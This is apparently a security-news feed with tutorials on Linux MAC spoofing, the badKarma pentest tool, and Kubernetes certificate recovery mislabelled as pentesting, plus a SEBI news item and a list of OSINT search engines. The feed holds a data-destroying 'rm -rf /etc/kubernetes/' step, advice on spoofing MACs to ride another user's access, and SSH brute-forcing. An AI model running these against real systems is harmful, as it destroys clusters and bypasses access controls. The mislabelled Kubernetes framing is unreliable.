Information Security Newspaper | Hacking News (https://www.securitynewspaper.com/)

How to easily spoof mac address automatically and be more anonymous
https://www.securitynewspaper.com/2022/07/29/how-to-easily-spoof-mac-address-automatically-and-be-more-anonymous/
Fri, 29 Jul 2022 18:21:58 +0000

In this article we will look at how to change (spoof) the MAC address on a Linux computer, and at the tools that can replace the MAC address automatically.

Why change the MAC address?

A MAC address is (or should be) unique to each network interface. If a device has several network interfaces, each of them has its own MAC address: a laptop has at least two, wired and Wi-Fi, and each has its own MAC address. Desktop computers are usually the same. So when we talk about “changing the MAC address”, keep in mind that there are several of them. On a device with several wired ports, each port has its own MAC address, and if the device supports wireless networks, each wireless interface (2.4 GHz and 5 GHz) also has its own.

Since the MAC address must be unique, it uniquely identifies the network device, and since that device is part of your computer, it uniquely identifies your computer. Moreover, the MAC address (also called the hardware or physical address) does not change when the operating system is changed.

In short, the MAC address is changed so that the device cannot be tracked and identified by it. But there is a more important reason than paranoia to learn about MAC addresses and about the ways to change them, or to stop your system from changing them: a captive portal (also called an intercepting portal) identifies users by their MAC address. A captive portal is a way of forcing the user to accept certain conditions before being given Internet access. You most often meet captive portals in public places that offer Wi-Fi Internet access to an indefinite circle of people but want to identify the user and/or allow access only to people with credentials. For example, at an airport you may have to confirm your phone number via SMS to use the free Wi-Fi network, and a hotel gives you a username and password for its Wi-Fi so that only hotel guests can use it.

Because of how captive portals work, they identify users by MAC address. Starting with NetworkManager 1.4.0 (a popular program for managing network connections on Linux), MAC addresses can be spoofed automatically, and with the wrong settings you may be unable to get Internet access through a captive portal. Routers configured with MAC filtering cause the same kind of problem.

And for pentesters there are of course other reasons to change the MAC address: for example, to pretend to be another user and take advantage of their already-granted access to the magical world of the Internet, or to increase anonymity.

Who can see my MAC address?

The MAC address is used to transfer data on the local network; it is not transmitted when you connect to websites or otherwise reach the global network. There are exceptions: some vulnerabilities allow a person who is not on your local network to learn your MAC address.

If you are connected to a router over the local network, the router knows your MAC address, but if you open a site on the Internet, the site owner cannot learn your MAC address.

All devices on the local network can see each other’s MAC addresses (there are many scanners that collect this data; a local network scan with arp-scan is one example). The situation with wireless interfaces is slightly different. If you are connected to an access point (router), all the rules of the local network apply: the router and the other devices can learn your MAC address. But in addition, anyone within reach of your Wi-Fi signal (from a phone or laptop) can learn your MAC address.

Spoofing MAC addresses in NetworkManager

NetworkManager may override a MAC address set by other programs

Starting with version 1.4.0, NetworkManager supports MAC spoofing and has many different options.

To understand them, we first need to understand a few concepts.

First, network adapters come in two groups:

  • wired (ethernet);
  • wireless (wifi).

For each group, MAC rules are customized separately.

Second, a wireless adapter can be in one of two states:

  • scanning (searching for networks, not connected) – controlled by the property wifi.scan-rand-mac-address; the default is yes, which means a random MAC address is used while scanning. The other accepted value is no;
  • connected to a network – controlled by the property wifi.cloned-mac-address; the default value is preserve.

For the wired interface (property ethernet.cloned-mac-address) and for the wireless interface in the connected state (property wifi.cloned-mac-address) the following values (modes) are available:

  • an explicit MAC address (i.e. you can write the exact value that will be assigned to the network interface)
  • permanent: use the MAC address burned into the device
  • preserve: do not change the device’s MAC address on activation (for example, if the MAC has been changed by another program, the current address is kept)
  • random: generate a random address for each connection
  • stable: similar to random, i.e. a random address is generated for each connection, but when connecting to the same network the same value is generated again
  • NULL / not set: the default, which falls back to the global setting. If no global setting is configured, NetworkManager falls back to preserve.

If you are trying to change the MAC address in some other way and it is not working, it is quite possible that NetworkManager, which changes the MAC address by its own rules, is responsible. Since most Linux distributions with a graphical interface install and run NetworkManager by default, to solve the problem you first need to understand how NetworkManager works and by what rules.

NetworkManager configuration files

NetworkManager settings, including the ones related to MAC addresses, can be put in the file /etc/NetworkManager/NetworkManager.conf or in an additional file with the .conf extension in the directory /etc/NetworkManager/conf.d.

The second option is strongly recommended: on an update, NetworkManager usually replaces the main NetworkManager.conf file, so changes made to /etc/NetworkManager/NetworkManager.conf will be overwritten.

How to make Kali Linux change the MAC address with each connection

If you want the MAC address to be changed for each connection, but the same MAC to be used when connecting to the same network, create the file /etc/NetworkManager/conf.d/mac.conf:

sudo gedit /etc/NetworkManager/conf.d/mac.conf

Add the lines:

[connection]
ethernet.cloned-mac-address=stable
wifi.cloned-mac-address=stable

The ethernet.cloned-mac-address and wifi.cloned-mac-address lines can be added individually or together.

Check the current values:

ip link

Restart the service:

sudo systemctl restart NetworkManager

Now connect to a wired and a wireless network and check the MAC addresses again.

As you can see, the MAC address is replaced for both the wired and the wireless interface.

As already mentioned, the same addresses are generated for the same networks; if you want a different MAC address every time, even for the same networks, the lines should look like this:

[connection]
ethernet.cloned-mac-address=random
wifi.cloned-mac-address=random

How to configure automatic MAC spoofing in Ubuntu and Linux Mint

Ubuntu and Linux Mint ship NetworkManager versions that support automatic MAC configuration. However, if you look at a Wi-Fi card on Ubuntu or Linux Mint, you will see the real MAC address. This is because the file /etc/NetworkManager/NetworkManager.conf explicitly disables spoofing.

To change this, open the file:

sudo gedit /etc/NetworkManager/NetworkManager.conf

and delete the lines:

[device]
wifi.scan-rand-mac-address=no

or comment them out so that they read:

#[device]
#wifi.scan-rand-mac-address=no

or change no to yes:

[device]
wifi.scan-rand-mac-address=yes

and restart NetworkManager:

sudo systemctl restart NetworkManager

In the same way you can add lines to replace the MAC address (these settings create a new address for each connection, but the same address is used when connecting to the same network):

[connection]
ethernet.cloned-mac-address=stable
wifi.cloned-mac-address=stable
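As an added example that is not part of the article and not NetworkManager's own tooling, the POSIX shell script below writes the drop-in described above and then reads the configuration back the way NetworkManager does, so you can see which value will actually apply before restarting the service. The function names (nm_write_mac_policy, nm_effective) are my own. It assumes the documented precedence: NetworkManager.conf is read first, then the files in conf.d in alphabetical order, and a later assignment of the same key overrides an earlier one. The configuration directory is a parameter, so the script can be tried against a scratch copy before touching /etc/NetworkManager.

```shell
#!/bin/sh
# Added example: write the NetworkManager MAC policy drop-in and check the
# effective value of a key across NetworkManager.conf and conf.d/*.conf.
# Function names are the author's own, not part of NetworkManager.

# nm_write_mac_policy <nm_dir> <mode>
#   Writes <nm_dir>/conf.d/mac.conf with the given cloned-mac-address mode for
#   both wired and Wi-Fi, refusing values NetworkManager does not accept
#   (an explicit MAC address is also allowed by NetworkManager, but not here).
nm_write_mac_policy() {
  dir=$1; mode=$2
  case $mode in
    permanent|preserve|random|stable) ;;
    *) echo "nm_write_mac_policy: unsupported mode '$mode'" >&2; return 1 ;;
  esac
  mkdir -p "$dir/conf.d" || return 1
  printf '[connection]\nethernet.cloned-mac-address=%s\nwifi.cloned-mac-address=%s\n' \
    "$mode" "$mode" > "$dir/conf.d/mac.conf"
}

# nm_effective <nm_dir> <section> <key>
#   Prints the value of <key> in [<section>] that NetworkManager will use:
#   NetworkManager.conf first, then conf.d/*.conf in alphabetical order (the
#   shell glob sorts them); the last assignment wins. Prints an empty line when
#   the key is set nowhere, in which case NetworkManager's built-in default
#   applies (preserve for cloned-mac-address, yes for wifi.scan-rand-mac-address).
nm_effective() {
  dir=$1; section=$2; key=$3
  files=""
  [ -f "$dir/NetworkManager.conf" ] && files="$dir/NetworkManager.conf"
  for f in "$dir"/conf.d/*.conf; do
    [ -f "$f" ] && files="$files $f"
  done
  [ -n "$files" ] || { echo ""; return 0; }
  # $files is deliberately unquoted: one word per file, paths without spaces
  awk -v sec="$section" -v key="$key" '
    FNR == 1 { cur = "" }                 # a new file starts outside any section
    /^[[:space:]]*[#;]/ { next }          # comment line
    /^[[:space:]]*\[/ {                   # [section] header
      cur = $0; sub(/^[[:space:]]*\[/, "", cur)
      cur = substr(cur, 1, index(cur, "]") - 1); next
    }
    cur == sec && index($0, "=") {
      k = $0; sub(/[[:space:]]*=.*$/, "", k); sub(/^[[:space:]]*/, "", k)
      if (k == key) {
        val = $0; sub(/^[^=]*=[[:space:]]*/, "", val); sub(/[[:space:]]+$/, "", val)
      }
    }
    END { print val }' $files
}

# Usage on a real system, after saving this file as nm_mac.sh (any name works)
# and before "sudo systemctl restart NetworkManager":
#   sudo sh -c '. ./nm_mac.sh; nm_write_mac_policy /etc/NetworkManager stable'
#   sh -c '. ./nm_mac.sh; nm_effective /etc/NetworkManager device wifi.scan-rand-mac-address'
```

Running nm_effective for [device] wifi.scan-rand-mac-address on an Ubuntu system with the stock NetworkManager.conf prints no, which is exactly the setting the previous section tells you to remove; a drop-in in conf.d that sets it to yes overrides it without editing the main file, so the change survives package updates.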

Other Ways to change the MAC address

Change MAC using iproute2

We will use the program ip, which is part of the iproute2 package.

Let’s start by checking the current MAC address with the command:

ip link show interface_name

where interface_name is the name of the network interface you want to look at. If you do not know the name, or want to see all interfaces, run the command without it:

ip link show

We are interested in the part after “link/ether”, which is a 6-byte number. It will look something like this:

link/ether 00:c0:ca:96:cf:cb

The first step in changing the MAC address is to bring the interface down. This is done with the command:

sudo ip link set dev interface_name down

where interface_name is replaced with the real name. In my case it is wlan0, so the actual command is:

sudo ip link set dev wlan0 down

Next comes the MAC change itself. You can use any hexadecimal value, but some networks are configured not to hand out IP addresses to clients whose MAC address does not match a known vendor (manufacturer). In that case, to connect successfully, use the MAC prefix of a real vendor (the first three bytes) and arbitrary values for the remaining three bytes.

To change the MAC address, run:

sudo ip link set dev interface_name address XX:XX:XX:XX:XX:XX

where XX:XX:XX:XX:XX:XX is the desired new MAC address.

For example, to set the hardware address EC:9B:F3:68:68:28 on my adapter, the command is:

sudo ip link set dev wlan0 address EC:9B:F3:68:68:28

In the last step we bring the interface back up, with a command of the form:

sudo ip link set dev interface_name up

For my system the actual command is:

sudo ip link set dev wlan0 up

To check that the MAC address has really changed, run the command again:

ip link show interface_name

The value after “link/ether” should be the one you set.
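As an added example that is not part of the article, the following POSIX shell script wraps the three-step iproute2 procedure above with the checks a practitioner wants before touching an interface: the new address must be six hexadecimal octets, it must be a unicast address (the kernel refuses a multicast address, i.e. one whose first octet has its lowest bit set), and, following the advice above about vendor prefixes, it can generate a random address that keeps the first three octets (the OUI) of the current one. The function names (valid_mac, random_mac, current_mac, set_mac) are my own; set_mac runs ip and therefore needs root, and nothing is executed unless an interface name is given on the command line.

```shell
#!/bin/sh
# Added example: validated wrapper around "ip link set dev ... address ...".
# Function names are the author's own; nothing below comes from the article.

# valid_mac <mac>: succeeds only for six colon-separated hex octets that form
# a unicast address (bit 0 of the first octet clear). The kernel rejects a
# multicast address anyway, but catching it here gives a clearer error.
valid_mac() {
  h='[0-9a-fA-F][0-9a-fA-F]'
  case $1 in
    $h:$h:$h:$h:$h:$h) ;;
    *) return 1 ;;
  esac
  first=$(( 0x${1%%:*} ))
  [ $(( first & 1 )) -eq 0 ]
}

# random_mac <current_mac> [keep-oui]: prints a fresh random address.
#   keep-oui: keep the first three octets (vendor prefix, OUI) of <current_mac>
#             and randomize only the last three, the same idea as "macchanger -e";
#             use this on networks that refuse addresses from unknown vendors.
#   default:  randomize all six octets, setting the locally-administered bit and
#             clearing the multicast bit of the first octet, like "macchanger -r".
random_mac() {
  cur=$1; keep=${2:-}
  # six random bytes as decimal numbers from the kernel RNG
  set -- $(od -An -tu1 -N6 /dev/urandom)
  if [ "$keep" = keep-oui ]; then
    oui=$(printf '%s' "$cur" | cut -d: -f1-3 | tr 'A-Z' 'a-z')
    printf '%s:%02x:%02x:%02x\n' "$oui" "$4" "$5" "$6"
  else
    b1=$(( ($1 | 2) & 254 ))
    printf '%02x:%02x:%02x:%02x:%02x:%02x\n' "$b1" "$2" "$3" "$4" "$5" "$6"
  fi
}

# current_mac <iface>: the address printed after "link/ether" by ip link show.
current_mac() {
  ip link show "$1" | awk '/link\/ether/ { print $2; exit }'
}

# set_mac <iface> <mac>: down, set address, up; prints the address now in use.
set_mac() {
  iface=$1; mac=$2
  if ! valid_mac "$mac"; then
    echo "set_mac: '$mac' is not a valid unicast MAC address" >&2
    return 1
  fi
  ip link set dev "$iface" down &&
    ip link set dev "$iface" address "$mac" &&
    ip link set dev "$iface" up &&
    current_mac "$iface"
}

# Command-line use (as root). With no arguments only the functions are defined.
#   sh macspoof.sh wlan0 EC:9B:F3:68:68:28   set an explicit address
#   sh macspoof.sh wlan0 keep-oui            random, vendor prefix kept
#   sh macspoof.sh wlan0                     fully random
if [ -n "${1:-}" ]; then
  iface=$1
  case ${2:-random} in
    random|keep-oui) new=$(random_mac "$(current_mac "$iface")" "${2:-}") ;;
    *) new=$2 ;;
  esac
  set_mac "$iface" "$new"
fi
```

The locally-administered bit (0x02 in the first octet) is what marks an address as not factory-assigned; the be:f7:5a:... address in the macchanger output later in this article has it set for the same reason. Keep in mind that NetworkManager may reapply its own cloned-mac-address policy on the next connection, so on a NetworkManager system the drop-in approach above is the durable one.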

Change MAC with macchanger

Another method uses macchanger (also known as GNU MAC Changer). The program offers various functions, such as changing the address so that it matches a particular manufacturer, or fully randomizing it.

Install macchanger – it is usually present in the official repositories, and in Kali Linux it is installed by default.

At the moment the MAC address is changed the device must not be in use (connected in any way, or in the up state). To bring the interface down:

sudo ip link set dev interface_name down

To change the MAC address you need to give the interface name; in each of the following commands replace wlan0 with the name of the interface whose MAC address you want to change.

To see the MAC address values, run the command with the -s option:

sudo macchanger -s wlan0

Something like this is shown:

Current MAC:   00:c0:ca:96:cf:cb (ALFA, INC.)
Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)

The “Current MAC” line is the address at this moment, and “Permanent MAC” is the constant (real) address.

To change the MAC address to a completely arbitrary one (option -r):

sudo macchanger -r wlan0

Output similar to the following is displayed:

Current MAC:   00:c0:ca:96:cf:cb (ALFA, INC.)
Permanent MAC: 00:c0:ca:96:cf:cb (ALFA, INC.)
New MAC:       be:f7:5a:e7:12:c2 (unknown)

The first two lines were explained above; the “New MAC” line is the new address.

To randomize only the bytes that identify the individual device and keep the vendor part of the current MAC address (i.e. a check of the MAC address will still show the same vendor), run the command with the -e option:

sudo macchanger -e wlan0

To set the MAC address to a specific value, run (option -m):

sudo macchanger -m XX:XX:XX:XX:XX:XX wlan0

Here XX:XX:XX:XX:XX:XX is the MAC address you want to change to.

Finally, to return the MAC address to its original, permanent value burned into the hardware (option -p):

sudo macchanger -p wlan0

Conclusion

NetworkManager now offers a wealth of MAC spoofing capabilities, including changing to a random address or to a specific one. A peculiarity of NetworkManager is the separation of the “scanning” and “connected” modes, i.e. you may not see that your settings have taken effect until you connect to a network.

If after changing the MAC address you have connection problems (you cannot connect to wired or wireless networks), it means that connections from MAC addresses of unknown vendors (manufacturers) are blocked. In that case use the first three octets (bytes) of a real vendor; the remaining three octets can be arbitrary, pentesting experts say.

For Windows we will soon write the article “How to change the MAC address on Windows”.

How to Use Advanced Network Intelligence Toolkit for Pentesting: badKarma
https://www.securitynewspaper.com/2022/07/21/how-to-use-advanced-network-intelligence-toolkit-for-pentesting-badkarma/
Thu, 21 Jul 2022 19:26:46 +0000

Searching for vulnerabilities on a host (the host can be a website, a web server, a network device such as a router, or an end-user computer) begins with collecting basic information: detecting hosts, scanning their ports for open ones, determining the services running on those ports, determining the service versions and looking up vulnerabilities for those versions, checking for weak passwords, and launching additional scans with various tools depending on the network services found.

This is usually a fairly typical set of actions that varies with the network services detected on the host, so there are already various automation tools that can scan a network range and, for example, start brute-forcing the services found.

We want to talk about another ethical hacking tool, badKarma. The program has a graphical interface in which it is enough to click the mouse – there is no need to type commands (although they can be adjusted for fine-tuning).

How to install badKarma

Installing badKarma is very simple. But it is only a graphical shell for launching tools, so you need to install all the tools the program uses. Therefore I recommend working with badKarma in Kali Linux, in which (almost) everything needed is already present.

To install badKarma in Kali Linux, run the commands:

sudo apt install python3-pip python3-gi phantomjs mitmproxy ffmpeg gir1.2-gtk-vnc-2.0 gir1.2-gtksource-3.0 gir1.2-vte-2.91 gir1.2-osmgpsmap-1.0 gir1.2-webkit2-4.0 knockpy ncat gobuster
git clone https://github.com/r3vn/badKarma.git
cd badKarma
sudo pip3 install -r requirements.txt
chmod +x badkarma.py
./badkarma.py

How to use badKarma

Start by entering the target. You can specify a site address, an IP address or a range of IP addresses:

You can also select a scan profile. The following options are available:

  • nmap_default – normal scan with Nmap,
  • nmap_intense_scan – intensive scan with Nmap, using the options -T4 -A -v -oX
  • nmap_intense_scan_all_tcp – intensive scan of all TCP ports with Nmap, using the options -p 1-65535 -T4 -A -v -oX
  • nmap_intense_scan_no_ping – intensive scan with Nmap without checking whether the host is up (no ping), using the options -T4 -A -v -Pn -oX
  • masscan_full_tcp – full scan with Masscan, using the options -p0-65535 --rate 10000 --banner
  • get-from-shodan – do not scan, but get the data from Shodan. To do this you must first enter your Shodan API key. In Kali Linux the Shodan API key goes in the file ~/bin/badKarma/conf/shodan.conf, and in BlackArch in the file /usr/share/badkarma/conf/shodan.conf

As the target I will add the local network through which I go online: 192.168.50.0/24

Scan results will be presented as a list of available hosts :

If you click on the host, open ports and running network services will be shown :

Under the list of running services is other additional information (if it is collected) about the operating system, location, MAC address and more :

Now we have two options: you can continue to explore the host as a whole, or focus on its individual services. To view the available options for working with the host, right-click on it :


Various types of scanning using Nmap, various options for finding subdomains, DNS record research, and other ways to get information on the host are available there.

By right-clicking on the services launched on the host, you can see the actions available for them :


For example, for SSH you can run a brute-force attack:

You can start searching for exploits with nmap, searchsploit or sploitus:

In this case the exact version of the service is determined (if this has not been done already) and exploits for it are searched for in popular databases.

There are especially many options for web services:

You can take a screenshot, clone a page, run popular vulnerability scanners, start searching for users, hosts, directories, subdomains, and more.

There is also WebSession (works with mitmproxy):

The data obtained during the work is not only displayed but also stored in the session file /tmp/badkarma.sqlite. If you want to keep this file, be sure to copy it to a safe place when you finish, since the /tmp directory is cleared automatically at each reboot.

Conclusion

badKarma is, on the whole, an interesting pentesting program with which you can quickly perform routine actions and keep the results in one place that is convenient to look at. As you will notice while working with the program, the set of operations for each service is chosen intelligently, depending on the type of service. If this list lacks some of your favourite tools, that is not a problem: badKarma is modular and you can add your own module.

Indian companies listed in stock exchange to provide infosec audits and information system inventory to government. New SEBI guidelines
https://www.securitynewspaper.com/2022/05/25/indian-companies-listed-in-stock-exchange-to-provide-infosec-audits-and-information-system-inventory-to-government-new-sebi-guidelines/
Wed, 25 May 2022 23:26:53 +0000

Securities and Exchange Board of India (SEBI) has released another update for its “Cyber Security and Cyber Resilience Framework,” establishing a considerably short deadline to file an exhaustive information security status report. The statement applies to financial institutions and companies in stock exchanges.

The update considers any system storing personally identifiable information (PII) as critical equipment, making them subject to regular reviews and testing processes. Technology implementations interacting with critical operating and maintenance systems are also considered critical.

Entities providing investment services shall also maintain an updated inventory of their systems, including hardware, software, storage units, network resources and data flows. System administrators should arrange frequent security audits, which may be performed only by entities previously approved by CERT-In.

If that were not enough, all organizations that provide these services must submit their security reports within ten days after receiving this notification.

As many readers may guess, ten days is a ridiculously short deadline to achieve such goals, so it is anticipated that many organizations will try to challenge this decision of the Indian government.

Online platforms think this is mission impossible, especially considering that the deadline granted by the authorities includes two weekends.

Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.

TOP 10: The best web browsers for cybersecurity specialists
https://www.securitynewspaper.com/2022/01/08/top-10-the-best-web-browsers-for-cybersecurity-specialists/
Sat, 08 Jan 2022 18:15:00 +0000

Search engines are one of the most widely used computer tools worldwide, since any user can access the Internet regardless of their level of computer knowledge. Although tools such as Chrome, Edge or Firefox are the best known, other web browsers offer other kinds of functions and protections.

This time, cybersecurity awareness experts from the International Institute of Cyber Security (IICS) will show you the 10 search engines most used by cybersecurity professionals and even by some hacking groups.

As usual, we remind you that this article was written for informational purposes only and should not be taken as a call to action, so IICS is not responsible for the misuse of the information contained herein. With this in mind, let’s start looking at web browsers.

Shodan

Cybersecurity awareness experts consider Shodan to be one of the best search engines today. This tool allows getting information about any device connected to the Internet, including webcams, alarms, servers, routers, traffic lights and many other devices.

Shodan may collect information such as IP addresses, HTTP server headers, location, and device type, which can be used to find security flaws and fix them, or even exploit them.

Censys

Censys is a tool similar to Shodan in general terms as it also allows you to monitor devices connected to the Internet, collect their information and provide detailed reports to users.

According to cybersecurity awareness specialists, Censys can also be used to view real-time information about the various attacks to which computer systems are exposed, being able to detect services vulnerable to known failures.

Greynoise

Greynoise is somewhat different from the tools listed above, as it allows you to identify servers and users who scan networks for vulnerabilities using tools such as Shodan. Using this tool, it is possible to get information about malicious websites, types of attacks, and security breaches by simply entering an IP address or related words.

Wigle

This is a search engine for finding and mapping wireless networks. The tool shows a map on which we can enter a latitude and longitude in order to find all the access points, Wi-Fi devices and telecommunications antennas available in that area.

Zoomeye

Zoomeye is a navigation map for finding vulnerabilities and active threats in networks and systems. It was developed mainly for the Chinese market and records large amounts of data collected from multiple sources, always ready for user consultation.

The tool can present statistics for all devices that can be accessed over the Internet from different countries, web browsers or servers.

Hunter

This is an internet search engine widely used by hacking groups to find unsecured email addresses. Hunter Search Engine can be used to search and retrieve all email addresses associated with a specific domain or organization.

During use, Hunter displays a list of email addresses that belong to the target domain, including their activity, as well as the public resources that were used for those addresses. The developers also created an API to test email ID deliverability and learn more about the organization.

PIPL

This is a useful Search Engine on the Internet to find information about a certain person, using as a reference general data associated with the person, such as phone numbers and email addresses, mention experts in cybersecurity awareness.

PublicWWW

This is a search engine designed to analyze any website for source code in HTML, CSS, JavaScript and other formats. Using PublicWWW, cybersecurity awareness experts can search websites based on their source code by simply providing a small piece of code; in response, the search engine will return a list of all websites that use similar code, which can prove very useful in subsequent analysis.

Have I Been Pwned

This tool is useful for both ethical hacking specialists and the general public, as it allows users to verify if an email address has been compromised in a cybersecurity incident.

The platform collects and identifies various database dumps and identifies exposed accounts, alerting the user to their compromised information or confirming that the email address or phone number is safe.

OSINT Framework

Open Source Intelligence Framework is capable of collecting information available from public sources, which is very useful for analysis and pentesting processes. This tool has a large number of menus and submenus, which allow you to obtain the desired results according to the goals of the research.

This cybersecurity framework is mainly employed by law enforcement and intelligence agencies in multiple countries, so it is constantly maintained and updated.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

How to perform Kubernetes pentesting and secure it?
https://www.securitynewspaper.com/2021/12/14/how-to-perform-kubernetes-pentesting-and-secure-it/
Wed, 15 Dec 2021 00:03:06 +0000

Kubernetes is a great platform for container management that has shown a breakthrough lately, both in terms of functionality and in terms of security and resiliency. Specialists claim that Kubernetes’ architecture makes it easy to survive different types of outages and stay active despite everything, making it a great option for pentesting.

On this occasion, pentesting experts from the International Institute of Cyber Security (IICS) will show you how to perform multiple hacking tasks on Kubernetes, including cluster disruption, certificate deletion, and node connection, all without downtime for the services being run.

Before continuing, as usual we remind you that this article was prepared for informational purposes only and should not be taken with a call to action. IICS is not responsible for the misuse of the information contained herein.

To get started, let’s recall that the Kubernetes control plane consists of a few components:

  • etcd: Used as a database
  • kube-apiserver: API and heart of the cluster
  • kube-controller-manager: For the deployment of operations on Kubernetes resources
  • kube-scheduler: Main planner
  • kubelets: To launch containers directly on hosts

Each of these components is protected by a set of TLS, client and server certificates, whose purpose is to authenticate and authorize components between them, mention pentesting experts. These resources are not stored anywhere in the Kubernetes database, except in certain cases, but are presented as normal files:

# tree /etc/kubernetes/pki/
/etc/kubernetes/pki/
├── apiserver.crt
├── apiserver-etcd-client.crt
├── apiserver-etcd-client.key
├── apiserver.key
├── apiserver-kubelet-client.crt
├── apiserver-kubelet-client.key
├── ca.crt
├── ca.key
├── CTNCA.pem
├── etcd
│   ├── ca.crt
│   ├── ca.key
│   ├── healthcheck-client.crt
│   ├── healthcheck-client.key
│   ├── peer.crt
│   ├── peer.key
│   ├── server.crt
│   └── server.key
├── front-proxy-ca.crt
├── front-proxy-ca.key
├── front-proxy-client.crt
├── front-proxy-client.key
├── sa.key
└── sa.pub

The components themselves are described and run on the masters as static pods from the /etc/kubernetes/manifests/ directory.

The most important thing is to know how to make a functional cluster of all this; let’s imagine that the Kubernetes components mentioned above somehow interact with each other. The basic diagram looks like this:

To communicate, they need TLS certificates, which, in principle, can be taken to a separate level of abstraction and completely rely on their distribution tool, be it kubeadm, kubespray or something else, pentesting experts mention. In this example, we’ll look at kubeadm because it’s the most common Kubernetes deployment tool and is often used as part of other solutions.

Let’s say we already have a cluster in place. Let’s start with the fun part:

rm -rf /etc/kubernetes/ 

In masters, this directory contains:

  • A set of certificates and CAs for etcd (in /etc/kubernetes/pki/etcd)
  • A set of certificates and CAs for Kubernetes (in /etc/kubernetes/pki)
  • Kubeconfigs for cluster-admin, kube-controller-manager, kube-scheduler and kubelet (in /etc/kubernetes/*.conf; each also embeds our cluster’s CA certificate, base64-encoded)
  • A set of static manifests for etcd, kube-apiserver, kube-scheduler and kube-controller-manager (in /etc/kubernetes/manifests)

Suppose we lost everything at once.    

Fixing the control plane

To avoid confusion, the researchers recommend making sure that all of our control plane pods are also stopped:

crictl rm `crictl ps -aq`

It should be remembered that kubeadm, by default, does not overwrite existing certificates and kubeconfigs, so to reissue them you must first delete them manually.

Let’s start by restoring etcd, because if we had a quorum (3 or more master nodes), the etcd cluster would not start unless a majority of its members were present.

kubeadm init phase certs etcd-ca

The above command will generate a new CA for our etcd cluster. Since all other certificates must be signed by it, we will copy it along with the private key to the rest of the master nodes:

/etc/kubernetes/pki/etcd/ca.{key,crt}

Now, let’s regenerate the rest of the etcd certificates and static manifests on all nodes in the control plane:

kubeadm init phase certs etcd-healthcheck-client
kubeadm init phase certs etcd-peer
kubeadm init phase certs etcd-server
kubeadm init phase etcd local 

At this stage we should already have a working etcd cluster, as the pentesting experts note:

# crictl ps
CONTAINER ID        IMAGE               CREATED             STATE               NAME                ATTEMPT             POD ID
ac82b4ed5d83a       0369cf4303ffd       2 seconds ago       Running             etcd                0                   bc8b4d568751b

Now let’s do the same for Kubernetes. On one of the master nodes, run:

kubeadm init phase certs all
kubeadm init phase kubeconfig all
kubeadm init phase control-plane all
cp -f /etc/kubernetes/admin.conf ~/.kube/config 

The above commands will generate all SSL certificates for our Kubernetes cluster, as well as the static manifests and kubeconfigs for the Kubernetes services. If you use kubeadm to join kubelets, you will also need to update the cluster-info configuration in the kube-public namespace, which still contains the hash of your old CA:

kubeadm init phase bootstrap-token  

Since the certificates on the other control-plane instances must also be signed by the same CA, copy the following files to the other control-plane nodes and repeat the above commands on each of them, as pentesting experts recommend:

/etc/kubernetes/pki/{ca,front-proxy-ca}.{key,crt}
/etc/kubernetes/pki/sa.{key,pub}  

As an alternative to copying the certificates manually, you can now use the Kubernetes API; for example, with the following command:

kubeadm init phase upload-certs --upload-certs

The certificates will then be encrypted and uploaded to Kubernetes for 2 hours, so you can rejoin the masters as follows:

kubeadm join phase control-plane-prepare all kubernetes-apiserver:6443 --control-plane --token cs0etm.ua7fbmwuf1jz946l     --discovery-token-ca-cert-hash sha256:555f6ececd4721fed0269d27a5c7f1c6d7ef4614157a18e56ed9a1fd031a3ab8 --certificate-key 385655ee0ab98d2441ba8038b4e8d03184df1806733eac131511891d1096be73
kubeadm join phase control-plane-join all

It’s worth noting that the Kubernetes API has another configuration that stores the CA certificate for the front proxy client, used to authenticate apiserver requests to webhooks and other aggregation layer services. Fortunately, kube-apiserver updates it automatically. However, you may want to manually clean it from the old certificates:

kubectl get cm -n kube-system extension-apiserver-authentication -o yaml

In any case, at this stage we already have a fully functioning control plane.

Fixing the workers

The following command lists all the nodes in the cluster, although they will all be in the NotReady state now:

kubectl get node

This happens because they are still using the old certificates and expect the API server’s certificate to be signed by the old CA. To work around this issue, we’ll use kubeadm to re-join the nodes to the cluster.

On the masters, which have access to the CA and can join locally:

systemctl stop kubelet
rm -rf /var/lib/kubelet/pki/ /etc/kubernetes/kubelet.conf
kubeadm init phase kubeconfig kubelet
kubeadm init phase kubelet-start 

Then, for the workers that need to join, we generate a new token:

kubeadm token create --print-join-command

And on each of them we run:

systemctl stop kubelet
rm -rf /var/lib/kubelet/pki/ /etc/kubernetes/pki/ /etc/kubernetes/kubelet.conf 
kubeadm join phase kubelet-start kubernetes-apiserver:6443  --token cs0etm.ua7fbmwuf1jz946l     --discovery-token-ca-cert-hash sha256:555f6ececd4721fed0269d27a5c7f1c6d7ef4614157a18e56ed9a1fd031a3ab8

Attention: on the masters it is not necessary to delete the /etc/kubernetes/pki/ directory, since it contains all the necessary certificates, as the pentesting experts point out.

The previous procedure will reconnect all your kubelets to the cluster without affecting the containers already running on them. However, if you have many nodes in the cluster and do this on all of them at the same time, you might run into a situation where the controller-manager starts recreating the pods of the NotReady nodes and tries to start them on the active nodes in the cluster.

To avoid this, we can temporarily stop the controller-manager on the masters:

rm /etc/kubernetes/manifests/kube-controller-manager.yaml
crictl rmp `crictl ps --name kube-controller-manager -q` 

The last command is only needed to make sure that the controller-manager is really not running. Once all the nodes in the cluster are connected, we can regenerate the static manifest to bring the controller-manager back.

To do this, run on all masters:

kubeadm init phase control-plane controller-manager

Note that you need to do this at the stage where you have already generated the join token; otherwise, the connection operation will crash when trying to read the cluster-info token.

If the kubelet is configured to request a serving certificate signed by your CA (the optional serverTLSBootstrap: true setting), you will also need to re-approve the CSRs of your kubelets:

kubectl get csr
kubectl certificate approve <csr> 

Fixing ServiceAccounts

There is one more thing. Since we lost /etc/kubernetes/pki/sa.key, which is the key that signed the JWT tokens of all our ServiceAccounts, we need to recreate the tokens for each of them, as pentesting experts point out.

This can be done simply by removing the token field from all secrets of type kubernetes.io/service-account-token:

kubectl get secret --all-namespaces | awk '/kubernetes.io\/service-account-token/ { print "kubectl patch secret -n " $1 " " $2 " -p {\\\"data\\\":{\\\"token\\\":null}}"}' | sh -x

After that, kube-controller-manager will automatically generate new tokens signed with a new key, pentesting experts mention. Unfortunately, not all microservices can re-read the token on the fly, and you’ll most likely need to manually restart the containers where they’re used:

kubectl get pod --field-selector 'spec.serviceAccountName!=default' --no-headers --all-namespaces | awk '{print "kubectl delete pod -n " $1 " " $2 " --wait=false --grace-period=0"}' 

